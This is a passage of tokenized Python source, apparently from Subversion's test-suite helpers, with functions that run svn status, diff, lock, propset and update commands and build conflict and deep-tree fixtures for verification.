RegexOutput ( error_re_string , match_all = False ) <EOL> verify . verify_outputs ( None , None , errput , None , expected_err ) <EOL> return <EOL> output = process_output_for_commit ( output ) <EOL> actual = tree . build_tree_from_commit ( output ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual , output_tree ) <EOL> except tree . SVNTreeError : <EOL> verify . display_trees ( "<STR_LIT>" , <EOL> "<STR_LIT>" , output_tree , actual ) <EOL> _log_tree_state ( "<STR_LIT>" , actual , wc_dir_name ) <EOL> raise <EOL> if status_tree : <EOL> run_and_verify_status ( wc_dir_name , status_tree ) <EOL> def run_and_verify_status ( wc_dir_name , output_tree , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( output_tree , wc . State ) : <EOL> output_state = output_tree <EOL> output_tree = output_tree . old_tree ( ) <EOL> else : <EOL> output_state = None <EOL> exit_code , output , errput = main . run_svn ( None , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> wc_dir_name ) <EOL> actual = tree . build_tree_from_status ( output ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT:status>" , actual , output_tree , <EOL> singleton_handler_a , a_baton , <EOL> singleton_handler_b , b_baton ) <EOL> except tree . SVNTreeError : <EOL> verify . display_trees ( None , '<STR_LIT>' , output_tree , actual ) <EOL> _log_tree_state ( "<STR_LIT>" , actual , wc_dir_name ) <EOL> raise <EOL> if output_state : <EOL> entries_state = wc . State . from_entries ( wc_dir_name ) <EOL> if entries_state : <EOL> tweaked = output_state . copy ( ) <EOL> tweaked . tweak_for_entries_compare ( ) <EOL> try : <EOL> tweaked . compare_and_display ( '<STR_LIT>' , entries_state ) <EOL> except tree . SVNTreeUnequal : <EOL> raise <EOL> def run_and_verify_unquiet_status ( wc_dir_name , status_tree ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( status_tree , wc . 
State ) : <EOL> status_tree = status_tree . old_tree ( ) <EOL>
# (Tail of run_and_verify_status -- its 'def' line lies above this chunk.) <EOL>
# Runs 'svn status' via main.run_svn, builds a tree from the output and compares it to status_tree; logs the actual tree and re-raises on mismatch. <EOL>
exit_code , output , errput = main . run_svn ( None , '<STR_LIT:status>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , wc_dir_name ) <EOL> actual = tree . build_tree_from_status ( output ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual , status_tree ) <EOL> except tree . SVNTreeError : <EOL> _log_tree_state ( "<STR_LIT>" , actual , wc_dir_name ) <EOL> raise <EOL>
# Run status in XML mode, parse the DOM, and compare the per-path entry dict against EXPECTED_ENTRIES; raises Failure on stderr output or mismatch (mismatch message is an ndiff of pprint dumps). <EOL>
# NOTE(review): mutable default argument expected_entries=[] -- only read here, but a None sentinel would be the safer idiom. <EOL>
def run_and_verify_status_xml ( expected_entries = [ ] , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> exit_code , output , errput = run_and_verify_svn ( None , None , [ ] , <EOL> '<STR_LIT:status>' , '<STR_LIT>' , * args ) <EOL> if len ( errput ) > <NUM_LIT:0> : <EOL> raise Failure <EOL> doc = parseString ( '<STR_LIT>' . join ( output ) ) <EOL> entries = doc . getElementsByTagName ( '<STR_LIT>' ) <EOL>
# Local helper: concatenate the data of all TEXT_NODE children of nodelist. <EOL>
def getText ( nodelist ) : <EOL> rc = [ ] <EOL> for node in nodelist : <EOL> if node . nodeType == node . TEXT_NODE : <EOL> rc . append ( node . data ) <EOL> return '<STR_LIT>' . join ( rc ) <EOL>
# Build actual_entries keyed by each entry's 'path' attribute; optional child elements (commit, author, repos-status) contribute extra keys only when present. <EOL>
actual_entries = { } <EOL> for entry in entries : <EOL> wcstatus = entry . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> commit = entry . getElementsByTagName ( '<STR_LIT>' ) <EOL> author = entry . getElementsByTagName ( '<STR_LIT>' ) <EOL> rstatus = entry . getElementsByTagName ( '<STR_LIT>' ) <EOL> actual_entry = { '<STR_LIT>' : wcstatus . getAttribute ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : wcstatus . getAttribute ( '<STR_LIT>' ) , <EOL> } <EOL> if wcstatus . hasAttribute ( '<STR_LIT>' ) : <EOL> actual_entry [ '<STR_LIT>' ] = wcstatus . getAttribute ( '<STR_LIT>' ) <EOL> if ( commit ) : <EOL> actual_entry [ '<STR_LIT>' ] = commit [ <NUM_LIT:0> ] . getAttribute ( '<STR_LIT>' ) <EOL> if ( author ) : <EOL> actual_entry [ '<STR_LIT>' ] = getText ( author [ <NUM_LIT:0> ] . childNodes ) <EOL> if ( rstatus ) : <EOL> actual_entry [ '<STR_LIT>' ] = rstatus [ <NUM_LIT:0> ] . getAttribute ( '<STR_LIT>' ) <EOL> actual_entry [ '<STR_LIT>' ] = rstatus [ <NUM_LIT:0> ] . getAttribute ( '<STR_LIT>' ) <EOL> actual_entries [ entry . getAttribute ( '<STR_LIT:path>' ) ] = actual_entry <EOL> if expected_entries != actual_entries : <EOL> raise Failure ( '<STR_LIT:\n>' + '<STR_LIT:\n>' . join ( difflib . ndiff ( <EOL> pprint . pformat ( expected_entries ) . splitlines ( ) , <EOL> pprint . pformat ( actual_entries ) . splitlines ( ) ) ) ) <EOL>
# Parse XML diff-summarize output and check each reported path's item/kind/props attributes against the parallel expected_* lists (indexed by the path's position in expected_paths). <EOL>
# NOTE(review): mutable default arguments ([]) throughout the signature; read-only here but fragile. Returns silently when stderr is non-empty (expected-error case). <EOL>
def run_and_verify_diff_summarize_xml ( error_re_string = [ ] , <EOL> expected_prefix = None , <EOL> expected_paths = [ ] , <EOL> expected_items = [ ] , <EOL> expected_props = [ ] , <EOL> expected_kinds = [ ] , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> exit_code , output , errput = run_and_verify_svn ( None , None , error_re_string , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , * args ) <EOL> if len ( errput ) > <NUM_LIT:0> : <EOL> return <EOL> doc = parseString ( '<STR_LIT>' . join ( output ) ) <EOL> paths = doc . getElementsByTagName ( "<STR_LIT:path>" ) <EOL> items = expected_items <EOL> kinds = expected_kinds <EOL> for path in paths : <EOL> modified_path = path . childNodes [ <NUM_LIT:0> ] . data <EOL>
# Strip the expected_prefix (when the path starts with it); an emptied path falls back to the last os.sep-separated component, and separators are normalized to '/' on non-POSIX hosts. <EOL>
if ( expected_prefix is not None <EOL> and modified_path . find ( expected_prefix ) == <NUM_LIT:0> ) : <EOL> modified_path = modified_path . replace ( expected_prefix , '<STR_LIT>' ) [ <NUM_LIT:1> : ] . strip ( ) <EOL> if len ( modified_path ) == <NUM_LIT:0> : <EOL> modified_path = path . childNodes [ <NUM_LIT:0> ] . data . split ( os . sep ) [ - <NUM_LIT:1> ] <EOL> if os . sep != "<STR_LIT:/>" : <EOL> modified_path = modified_path . replace ( os . sep , "<STR_LIT:/>" ) <EOL> if modified_path not in expected_paths : <EOL> logger . warn ( "<STR_LIT>" , modified_path ) <EOL> raise Failure <EOL> index = expected_paths . index ( modified_path ) <EOL> expected_item = items [ index ] <EOL> expected_kind = kinds [ index ] <EOL> expected_prop = expected_props [ index ] <EOL> actual_item = path . getAttribute ( '<STR_LIT>' ) <EOL> actual_kind = path . getAttribute ( '<STR_LIT>' ) <EOL> actual_prop = path . getAttribute ( '<STR_LIT>' ) <EOL> if expected_item != actual_item : <EOL> logger . warn ( "<STR_LIT>" , expected_item , actual_item ) <EOL> raise Failure <EOL> if expected_kind != actual_kind : <EOL> logger . warn ( "<STR_LIT>" , expected_kind , actual_kind ) <EOL> raise Failure <EOL> if expected_prop != actual_prop : <EOL> logger . warn ( "<STR_LIT>" , expected_prop , actual_prop ) <EOL> raise Failure <EOL>
# Non-XML variant: build a tree from diff-summarize output and compare it to OUTPUT_TREE (a wc.State is converted via old_tree first); displays both trees and re-raises on mismatch. <EOL>
def run_and_verify_diff_summarize ( output_tree , * args ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( output_tree , wc . State ) : <EOL> output_tree = output_tree . old_tree ( ) <EOL> exit_code , output , errput = main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , <EOL> * args ) <EOL> actual = tree . build_tree_from_diff_summarize ( output ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual , output_tree ) <EOL> except tree . SVNTreeError : <EOL> verify . display_trees ( None , '<STR_LIT>' , output_tree , actual ) <EOL> _log_tree_state ( "<STR_LIT>" , actual ) <EOL> raise <EOL>
# Lock PATH as USERNAME with a path-derived comment, then verify via 'svn info' that token, owner, creation date and comment all appear (four DOTALL regexes must all match). <EOL>
def run_and_validate_lock ( path , username ) : <EOL> """<STR_LIT>""" <EOL> comment = "<STR_LIT>" % path <EOL> run_and_verify_svn ( None , "<STR_LIT>" , [ ] , '<STR_LIT>' , <EOL> '<STR_LIT>' , username , <EOL> '<STR_LIT>' , comment , path ) <EOL> exit_code , output , err = run_and_verify_svn ( None , None , [ ] , <EOL> '<STR_LIT:info>' , '<STR_LIT>' , <EOL> path ) <EOL> token_re = re . compile ( "<STR_LIT>" , re . DOTALL ) <EOL> author_re = re . compile ( "<STR_LIT>" % username , re . DOTALL ) <EOL> created_re = re . compile ( "<STR_LIT>" , re . DOTALL ) <EOL> comment_re = re . compile ( "<STR_LIT>" % re . escape ( comment ) , re . DOTALL ) <EOL> output = "<STR_LIT>" . join ( output ) <EOL> if ( not ( token_re . match ( output ) and <EOL> author_re . match ( output ) and <EOL> created_re . match ( output ) and <EOL> comment_re . match ( output ) ) ) : <EOL> raise Failure <EOL>
# Shared driver for resolve/resolved: expects one output line per path, order-insensitive; when no extra args are given the paths themselves are the arguments. <EOL>
def _run_and_verify_resolve ( cmd , expected_paths , * args ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) == <NUM_LIT:0> : <EOL> args = expected_paths <EOL> expected_output = verify . UnorderedOutput ( [ <EOL> "<STR_LIT>" + path + "<STR_LIT>" for path in <EOL> expected_paths ] ) <EOL> run_and_verify_svn ( None , expected_output , [ ] , <EOL> cmd , * args ) <EOL>
# Thin wrappers selecting which subcommand _run_and_verify_resolve drives. <EOL>
def run_and_verify_resolve ( expected_paths , * args ) : <EOL> """<STR_LIT>""" <EOL> _run_and_verify_resolve ( '<STR_LIT>' , expected_paths , * args ) <EOL> def run_and_verify_resolved ( expected_paths , * args ) : <EOL> """<STR_LIT>""" <EOL> _run_and_verify_resolve ( '<STR_LIT>' , expected_paths , * args ) <EOL>
# Same one-line-per-path pattern as the resolve helpers, for revert. <EOL>
def run_and_verify_revert ( expected_paths , * args ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) == <NUM_LIT:0> : <EOL> args = expected_paths <EOL> expected_output = verify . UnorderedOutput ( [ <EOL> "<STR_LIT>" + path + "<STR_LIT>" for path in <EOL> expected_paths ] ) <EOL> run_and_verify_svn ( None , expected_output , [ ] , <EOL> "<STR_LIT>" , * args ) <EOL>
# Guarantee the greek repository (unless read_only) and either check out a verified working copy or just ensure the general wc dir exists. <EOL>
# NOTE(review): 'except OSError , err' is Python-2-only syntax; this module cannot run under Python 3 as written. <EOL>
def make_repo_and_wc ( sbox , create_wc = True , read_only = False , <EOL> minor_version = None ) : <EOL> """<STR_LIT>""" <EOL> if not read_only : <EOL> guarantee_greek_repository ( sbox . repo_dir , minor_version ) <EOL> if create_wc : <EOL> expected_output = main . greek_state . copy ( ) <EOL> expected_output . wc_dir = sbox . wc_dir <EOL> expected_output . tweak ( status = '<STR_LIT>' , contents = None ) <EOL> expected_wc = main . greek_state <EOL> run_and_verify_checkout ( sbox . repo_url , <EOL> sbox . wc_dir , <EOL> expected_output , <EOL> expected_wc ) <EOL> else : <EOL> try : <EOL> os . mkdir ( main . general_wc_dir ) <EOL> except OSError , err : <EOL>
# EEXIST is benign (dir already present); anything else propagates. <EOL>
if err . errno != errno . EEXIST : <EOL> raise <EOL>
# Replace wc_copy_name with a fresh recursive copy of wc_name. <EOL>
def duplicate_dir ( wc_name , wc_copy_name ) : <EOL> """<STR_LIT>""" <EOL> main . safe_rmtree ( wc_copy_name ) <EOL> shutil . copytree ( wc_name , wc_copy_name ) <EOL>
# Copy of the greek state pinned to wc_dir, with every node at wc_rev=rev and one extra StateItem added to desc. <EOL>
def get_virginal_state ( wc_dir , rev ) : <EOL> "<STR_LIT>" <EOL> rev = str ( rev ) <EOL> state = main . greek_state . copy ( ) <EOL> state . wc_dir = wc_dir <EOL> state . desc [ '<STR_LIT>' ] = wc . StateItem ( ) <EOL> state . tweak ( contents = None , status = '<STR_LIT:U+0020>' , wc_rev = rev ) <EOL> return state <EOL>
# NOTE(review): the (db, root_path, relpath) tuple from wc.open_wc_db is never used -- presumably the open itself matters (or this is dead code); verify before cleaning up. <EOL>
def lock_admin_dir ( wc_dir , recursive = False ) : <EOL> "<STR_LIT>" <EOL> db , root_path , relpath = wc . open_wc_db ( wc_dir ) <EOL> svntest . main . run_wc_lock_tester ( recursive , wc_dir ) <EOL> def set_incomplete ( wc_dir , revision ) : <EOL> "<STR_LIT>" <EOL> svntest . main . run_wc_incomplete_tester ( wc_dir , revision ) <EOL>
# Single-field lookups from the first parsed 'svn info' entry. <EOL>
def get_wc_uuid ( wc_dir ) : <EOL> "<STR_LIT>" <EOL> return run_and_parse_info ( wc_dir ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> def get_wc_base_rev ( wc_dir ) : <EOL> "<STR_LIT>" <EOL> return run_and_parse_info ( wc_dir ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL>
# Build the expected server error message for a failing hook; wording depends on server minor version and which hook (hence which action) is involved. <EOL>
def hook_failure_message ( hook_name ) : <EOL> """<STR_LIT>""" <EOL> if svntest . main . options . server_minor_version < <NUM_LIT:5> : <EOL> return "<STR_LIT>" % hook_name <EOL> else : <EOL> if hook_name in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> action = "<STR_LIT>" <EOL> elif hook_name == "<STR_LIT>" : <EOL> action = "<STR_LIT>" <EOL> elif hook_name == "<STR_LIT>" : <EOL> action = "<STR_LIT>" <EOL> elif hook_name == "<STR_LIT>" : <EOL> action = "<STR_LIT>" <EOL> else : <EOL> action = None <EOL> if action is None : <EOL> message = "<STR_LIT>" % ( hook_name , ) <EOL> else : <EOL> message = "<STR_LIT>" % ( action , hook_name ) <EOL> return message + "<STR_LIT>" <EOL>
# Install a hook script (under repo_dir) whose body embeds repr(text) and fails. <EOL>
def create_failing_hook ( repo_dir , hook_name , text ) : <EOL> """<STR_LIT>""" <EOL> hook_path = os . path . join ( repo_dir , '<STR_LIT>' , hook_name ) <EOL> main . create_python_hook_script ( hook_path , '<STR_LIT>' <EOL> '<STR_LIT>' + repr ( text ) + '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL>
# Install pre-revprop-change hooks that allow (enable_) or reject (disable_) revprop changes; create_failing_post_commit_hook installs a failing post-commit hook. <EOL>
def enable_revprop_changes ( repo_dir ) : <EOL> """<STR_LIT>""" <EOL> hook_path = main . get_pre_revprop_change_hook_path ( repo_dir ) <EOL> main . create_python_hook_script ( hook_path , '<STR_LIT>' , <EOL> cmd_alternative = '<STR_LIT>' ) <EOL> def disable_revprop_changes ( repo_dir ) : <EOL> """<STR_LIT>""" <EOL> hook_path = main . get_pre_revprop_change_hook_path ( repo_dir ) <EOL> main . create_python_hook_script ( hook_path , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> cmd_alternative = <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def create_failing_post_commit_hook ( repo_dir ) : <EOL> """<STR_LIT>""" <EOL> hook_path = main . get_post_commit_hook_path ( repo_dir ) <EOL> main . create_python_hook_script ( hook_path , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> cmd_alternative = <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL>
# Set a property on PATH. Values that start with '-', contain NUL, or any value on win32 go through a temp file (binary mode) so the command line cannot mangle them; otherwise the value is passed inline. Optional stderr verification via a regex (auto-wrapped unless already anchored). <EOL>
def set_prop ( name , value , path , expected_re_string = None ) : <EOL> """<STR_LIT>""" <EOL> if value and ( value [ <NUM_LIT:0> ] == '<STR_LIT:->' or '<STR_LIT:\x00>' in value or sys . platform == '<STR_LIT:win32>' ) : <EOL> from tempfile import mkstemp <EOL> ( fd , value_file_path ) = mkstemp ( ) <EOL> os . close ( fd ) <EOL> value_file = open ( value_file_path , '<STR_LIT:wb>' ) <EOL> value_file . write ( value ) <EOL> value_file . flush ( ) <EOL> value_file . close ( ) <EOL> exit_code , out , err = main . run_svn ( expected_re_string , '<STR_LIT>' , <EOL> '<STR_LIT>' , value_file_path , name , path ) <EOL> os . remove ( value_file_path ) <EOL> else : <EOL> exit_code , out , err = main . run_svn ( expected_re_string , '<STR_LIT>' , <EOL> name , value , path ) <EOL> if expected_re_string : <EOL> if not expected_re_string . startswith ( "<STR_LIT>" ) : <EOL> expected_re_string = "<STR_LIT>" + expected_re_string + "<STR_LIT:)>" <EOL> expected_err = verify . RegexOutput ( expected_re_string , match_all = False ) <EOL> verify . verify_outputs ( None , None , err , None , expected_err ) <EOL>
# Read a property (optionally a revprop at the given revision) with explicit auth/config options and compare raw output lines to exp_out; logs all three and raises Failure on mismatch. <EOL>
def check_prop ( name , path , exp_out , revprop = None ) : <EOL> """<STR_LIT>""" <EOL> if revprop is not None : <EOL> revprop_options = [ '<STR_LIT>' , '<STR_LIT>' , revprop ] <EOL> else : <EOL> revprop_options = [ ] <EOL> exit_code , out , err = main . run_command ( main . svn_binary , None , <NUM_LIT:1> , '<STR_LIT>' , <EOL> '<STR_LIT>' , name , path , <EOL> '<STR_LIT>' , <EOL> main . default_config_dir , <EOL> '<STR_LIT>' , main . wc_author , <EOL> '<STR_LIT>' , main . wc_passwd , <EOL> * revprop_options ) <EOL> if out != exp_out : <EOL> logger . warn ( "<STR_LIT>" , name ) <EOL> logger . warn ( "<STR_LIT>" , exp_out ) <EOL> logger . warn ( "<STR_LIT>" , out ) <EOL> raise Failure <EOL>
# Write (or append) three numbered lines to wc_path, derived from line_nbr and the file's basename; returns the text written so callers can build expected contents. <EOL>
def fill_file_with_lines ( wc_path , line_nbr , line_descrip = None , <EOL> append = True ) : <EOL> """<STR_LIT>""" <EOL> if line_descrip is None : <EOL> line_descrip = "<STR_LIT>" <EOL> contents = "<STR_LIT>" <EOL> for n in range ( line_nbr , line_nbr + <NUM_LIT:3> ) : <EOL> contents = contents + line_descrip + "<STR_LIT:U+0020>" + repr ( n ) + "<STR_LIT>" + os . path . basename ( wc_path ) + "<STR_LIT>" <EOL> if append : <EOL> main . file_append ( wc_path , contents ) <EOL> else : <EOL> main . file_write ( wc_path , contents ) <EOL> return contents <EOL>
# Manufacture a text conflict on file_path: commit new contents, update back to prev_rev, write conflicting contents, then update to merged_rev; expected_disk/expected_status are tweaked in step so the caller's expectations track each phase. <EOL>
def inject_conflict_into_wc ( sbox , state_path , file_path , <EOL> expected_disk , expected_status , merged_rev ) : <EOL> """<STR_LIT>""" <EOL> wc_dir = sbox . wc_dir <EOL> contents = fill_file_with_lines ( file_path , <NUM_LIT:1> , "<STR_LIT>" , append = False ) <EOL> prev_rev = expected_status . desc [ state_path ] . wc_rev <EOL> expected_output = wc . State ( wc_dir , { <EOL> state_path : wc . StateItem ( verb = '<STR_LIT>' ) , <EOL> } ) <EOL> if expected_status : <EOL> expected_status . tweak ( state_path , wc_rev = merged_rev ) <EOL> run_and_verify_commit ( wc_dir , expected_output , expected_status , <EOL> None , file_path ) <EOL> exit_code , output , errput = main . run_svn ( None , "<STR_LIT>" , "<STR_LIT>" , str ( prev_rev ) , <EOL> file_path ) <EOL> if expected_status : <EOL> expected_status . tweak ( state_path , wc_rev = prev_rev ) <EOL> conflicting_contents = fill_file_with_lines ( file_path , <NUM_LIT:1> , "<STR_LIT>" , <EOL> append = False ) <EOL> if expected_disk : <EOL> expected_disk . tweak ( state_path , contents = "<STR_LIT>" ) <EOL> expected_output = wc . State ( wc_dir , { <EOL> state_path : wc . StateItem ( status = '<STR_LIT>' ) , <EOL> } ) <EOL> inject_conflict_into_expected_state ( state_path , <EOL> expected_disk , expected_status , <EOL> conflicting_contents , contents , <EOL> merged_rev ) <EOL> exit_code , output , errput = main . run_svn ( None , "<STR_LIT>" , "<STR_LIT>" , str ( merged_rev ) , <EOL> file_path ) <EOL> if expected_status : <EOL> expected_status . tweak ( state_path , wc_rev = merged_rev ) <EOL>
# Mutate the caller's expected state objects to reflect the injected conflict: append conflict-marker text to the disk expectation, flip the status expectation. <EOL>
def inject_conflict_into_expected_state ( state_path , <EOL> expected_disk , expected_status , <EOL> wc_text , merged_text , merged_rev ) : <EOL> """<STR_LIT>""" <EOL> if expected_disk : <EOL> conflict_marker = make_conflict_marker_text ( wc_text , merged_text , <EOL> merged_rev ) <EOL> existing_text = expected_disk . desc [ state_path ] . contents or "<STR_LIT>" <EOL> expected_disk . tweak ( state_path , contents = existing_text + conflict_marker ) <EOL> if expected_status : <EOL> expected_status . tweak ( state_path , status = '<STR_LIT>' ) <EOL>
# Assemble the conflict-marker block (working text / merged text / revision). <EOL>
def make_conflict_marker_text ( wc_text , merged_text , merged_rev ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" + wc_text + "<STR_LIT>" + merged_text + "<STR_LIT>" + str ( merged_rev ) + "<STR_LIT:\n>" <EOL>
# Build a greek working copy containing three prepared tree conflicts under A/D/G (edit pi, delete rho and tau, commit at r2, back-date to r1, then make conflicting local changes and update). <EOL>
def build_greek_tree_conflicts ( sbox ) : <EOL> """<STR_LIT>""" <EOL> sbox . build ( ) <EOL> wc_dir = sbox . wc_dir <EOL> j = os . path . join <EOL> G = j ( wc_dir , '<STR_LIT:A>' , '<STR_LIT:D>' , '<STR_LIT>' ) <EOL> pi = j ( G , '<STR_LIT>' ) <EOL> rho = j ( G , '<STR_LIT>' ) <EOL> tau = j ( G , '<STR_LIT>' ) <EOL> main . file_append ( pi , "<STR_LIT>" ) <EOL> main . run_svn ( None , '<STR_LIT>' , rho ) <EOL> main . run_svn ( None , '<STR_LIT>' , tau ) <EOL> expected_output = wc . State ( wc_dir , { <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> } ) <EOL> expected_status = get_virginal_state ( wc_dir , <NUM_LIT:1> ) <EOL> expected_status . tweak ( '<STR_LIT>' , wc_rev = '<STR_LIT:2>' ) <EOL> expected_status . remove ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> run_and_verify_commit ( wc_dir , expected_output , expected_status , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> expected_output = wc . State ( wc_dir , { <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' ) , <EOL> } ) <EOL> expected_disk = main . greek_state <EOL> expected_status = get_virginal_state ( wc_dir , <NUM_LIT:1> ) <EOL> run_and_verify_update ( wc_dir , expected_output , expected_disk , <EOL> expected_status , None , None , None , None , None , False , <EOL> '<STR_LIT>' , '<STR_LIT:1>' , wc_dir ) <EOL> main . run_svn ( None , '<STR_LIT>' , pi ) <EOL> main . file_append ( rho , "<STR_LIT>" ) <EOL> main . run_svn ( None , '<STR_LIT>' , tau ) <EOL> run_and_verify_svn ( None , verify . AnyOutput , [ ] , '<STR_LIT>' , wc_dir ) <EOL>
# Create the on-disk "deep trees" fixture under base: dirs F, D, DF, DD, DDF, DDD at increasing nesting depth, plus files alpha/beta/gamma. <EOL>
def make_deep_trees ( base ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> F = j ( base , '<STR_LIT:F>' ) <EOL> D = j ( base , '<STR_LIT:D>' ) <EOL> DF = j ( base , '<STR_LIT>' ) <EOL> DD = j ( base , '<STR_LIT>' ) <EOL> DDF = j ( base , '<STR_LIT>' ) <EOL> DDD = j ( base , '<STR_LIT>' ) <EOL> os . makedirs ( F ) <EOL> os . makedirs ( j ( D , '<STR_LIT>' ) ) <EOL> os . makedirs ( j ( DF , '<STR_LIT>' ) ) <EOL> os . makedirs ( j ( DD , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> os . makedirs ( j ( DDF , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> os . makedirs ( j ( DDD , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> alpha = j ( F , '<STR_LIT>' ) <EOL> beta = j ( DF , '<STR_LIT>' , '<STR_LIT>' ) <EOL> gamma = j ( DDF , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> main . file_append ( alpha , "<STR_LIT>" ) <EOL> main . file_append ( beta , "<STR_LIT>" ) <EOL> main . file_append ( gamma , "<STR_LIT>" ) <EOL>
# Create the deep-trees fixture inside the working copy and schedule it for addition. <EOL>
def add_deep_trees ( sbox , base_dir_name ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> base = j ( sbox . wc_dir , base_dir_name ) <EOL> make_deep_trees ( base ) <EOL> main . run_svn ( None , '<STR_LIT>' , base ) <EOL>
# Module-level alias plus canned wc.State snapshots of the deep-trees fixture at various stages; used as expected disk/status templates by the scheme drivers below. <EOL>
Item = wc . StateItem <EOL> deep_trees_virginal_state = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT:F>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT:D>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> } ) <EOL>
# Local action: modify the three leaf files (and property-edit/add under the pure-directory trees) so every tree gets a leaf-level change. <EOL>
def deep_trees_leaf_edit ( base ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> F = j ( base , '<STR_LIT:F>' , '<STR_LIT>' ) <EOL> DF = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDF = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> main . file_append ( F , "<STR_LIT>" ) <EOL> main . file_append ( DF , "<STR_LIT>" ) <EOL> main . file_append ( DDF , "<STR_LIT>" ) <EOL> run_and_verify_svn ( None , verify . AnyOutput , [ ] , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1>' , F , DF , DDF ) <EOL> D = j ( base , '<STR_LIT:D>' , '<STR_LIT>' ) <EOL> DD = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDD = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> run_and_verify_svn ( None , verify . AnyOutput , [ ] , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1>' , D , DD , DDD ) <EOL> D = j ( base , '<STR_LIT:D>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DD = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDD = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> main . file_append ( D , "<STR_LIT>" ) <EOL> main . file_append ( DD , "<STR_LIT>" ) <EOL> main . file_append ( DDD , "<STR_LIT>" ) <EOL> run_and_verify_svn ( None , verify . AnyOutput , [ ] , <EOL> '<STR_LIT>' , D , DD , DDD ) <EOL> deep_trees_after_leaf_edit = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT:F>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT:D>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> 